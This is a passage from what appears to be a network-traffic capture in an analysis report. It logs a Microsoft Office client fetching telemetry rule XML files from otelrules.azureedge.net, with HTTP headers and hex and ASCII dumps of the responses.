                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:21 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                  Session IDSource IPSource PortDestination IPDestination Port
                  109192.168.2.44985713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:21 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:21 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:21 GMT
                  Content-Type: text/xml
                  Content-Length: 1360
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                  ETag: "0x8DC582BDD74D2EC"
                  x-ms-request-id: 95bc9e17-201e-0051-77f2-247340000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044821Z-15b8d89586f8l5961kfst8fpb0000000077g000000009m7r
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:21 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  110192.168.2.44985813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:21 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:21 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:21 GMT
                  Content-Type: text/xml
                  Content-Length: 1427
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                  ETag: "0x8DC582BE56F6873"
                  x-ms-request-id: 4c920d0e-c01e-008d-4cca-202eec000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044821Z-16849878b78p6ttkmyustyrk8s00000005qg000000001y6x
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:21 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                  Session IDSource IPSource PortDestination IPDestination Port
                  111192.168.2.44985913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:21 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:21 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:21 GMT
                  Content-Type: text/xml
                  Content-Length: 1390
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                  ETag: "0x8DC582BE3002601"
                  x-ms-request-id: 332ff9ef-a01e-003d-42f3-2498d7000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044821Z-r197bdfb6b4t7wszdvrfk02ah4000000073g00000000qgmb
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:21 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                  Session IDSource IPSource PortDestination IPDestination Port
                  112192.168.2.44986013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:21 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:21 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:21 GMT
                  Content-Type: text/xml
                  Content-Length: 1401
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                  ETag: "0x8DC582BE2A9D541"
                  x-ms-request-id: 654233af-a01e-001e-0b27-2149ef000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044821Z-16849878b78dkr6tqerbnpg1zc00000005sg00000000763w
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:21 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                  Session IDSource IPSource PortDestination IPDestination Port
                  113192.168.2.44986213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:21 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:22 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:21 GMT
                  Content-Type: text/xml
                  Content-Length: 1391
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                  ETag: "0x8DC582BDF58DC7E"
                  x-ms-request-id: 5342d47f-d01e-0028-2f83-217896000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044821Z-16849878b789m94j7902zfvfr000000005h000000000ka0r
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:22 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                  Session IDSource IPSource PortDestination IPDestination Port
                  114192.168.2.44986113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:21 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:22 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:22 GMT
                  Content-Type: text/xml
                  Content-Length: 1364
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                  ETag: "0x8DC582BEB6AD293"
                  x-ms-request-id: 97ea84b8-d01e-005a-0430-217fd9000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044821Z-16849878b784cpcc2dr9ch74ng00000005t000000000ch6g
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:22 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  115192.168.2.44986313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:21 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:22 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:22 GMT
                  Content-Type: text/xml
                  Content-Length: 1354
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                  ETag: "0x8DC582BE0662D7C"
                  x-ms-request-id: c3694284-101e-0017-53f5-2447c7000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044822Z-15b8d89586fxdh48qknu9dqk2g000000010000000000aaaa
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:22 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                  Session IDSource IPSource PortDestination IPDestination Port
                  116192.168.2.44986413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:22 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:22 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:22 GMT
                  Content-Type: text/xml
                  Content-Length: 1403
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                  ETag: "0x8DC582BDCDD6400"
                  x-ms-request-id: e8b9c1e5-a01e-001e-79f2-2449ef000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044822Z-15b8d89586ffsjj9qb0gmb1stn00000001a0000000001pup
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:22 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                  Session IDSource IPSource PortDestination IPDestination Port
                  117192.168.2.44986513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:22 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:22 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:22 GMT
                  Content-Type: text/xml
                  Content-Length: 1366
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                  ETag: "0x8DC582BDF1E2608"
                  x-ms-request-id: b9c92f65-401e-0016-1c27-2153e0000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044822Z-16849878b78q4pnrt955f8nkx800000005r0000000000bck
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:22 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                  Session IDSource IPSource PortDestination IPDestination Port
                  118192.168.2.44986613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:22 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:22 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:22 GMT
                  Content-Type: text/xml
                  Content-Length: 1399
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                  ETag: "0x8DC582BE8C605FF"
                  x-ms-request-id: d2bdf8af-801e-0078-25f4-24bac6000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044822Z-r197bdfb6b49q495mwyebb3r6s00000008rg00000000354f
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:22 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                  Session IDSource IPSource PortDestination IPDestination Port
                  119192.168.2.44986713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:22 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:22 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:22 GMT
                  Content-Type: text/xml
                  Content-Length: 1362
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                  ETag: "0x8DC582BDF497570"
                  x-ms-request-id: c2bf3a2c-401e-0047-4d9c-248597000000
                  x-ms-version: 2018-03-28
